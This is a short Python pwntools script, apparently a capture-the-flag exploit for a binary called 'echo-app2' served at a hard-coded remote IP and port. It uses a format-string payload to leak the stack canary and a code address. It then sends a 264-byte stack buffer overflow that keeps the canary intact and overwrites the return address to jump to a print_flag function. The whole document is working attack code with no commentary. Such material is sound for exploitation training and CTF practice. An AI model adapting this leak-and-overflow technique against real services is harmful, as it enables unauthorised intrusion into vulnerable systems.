#!/usr/bin/python3

from pwn import *

context.binary = target = ELF("./echo-app2", checksec=False)
# r = process()
r = remote("54.85.45.101", 8009)

# funcs
s = lambda a: r.sendline(a)

# leak
buf = b"%39$p.%42$p"
s(buf)
leaks = r.recvS(34).split(".")
canary = int(leaks[0], 16)
log.info("canary: %#x", canary)
target.address = int(leaks[1], 16)-0x15a1
log.info("main: %#x", target.address)

# buf
buf = b"A"*264
buf += p64(canary)
buf += p64(0)
buf += p64(target.sym.print_flag)
s(buf)

r.interactive()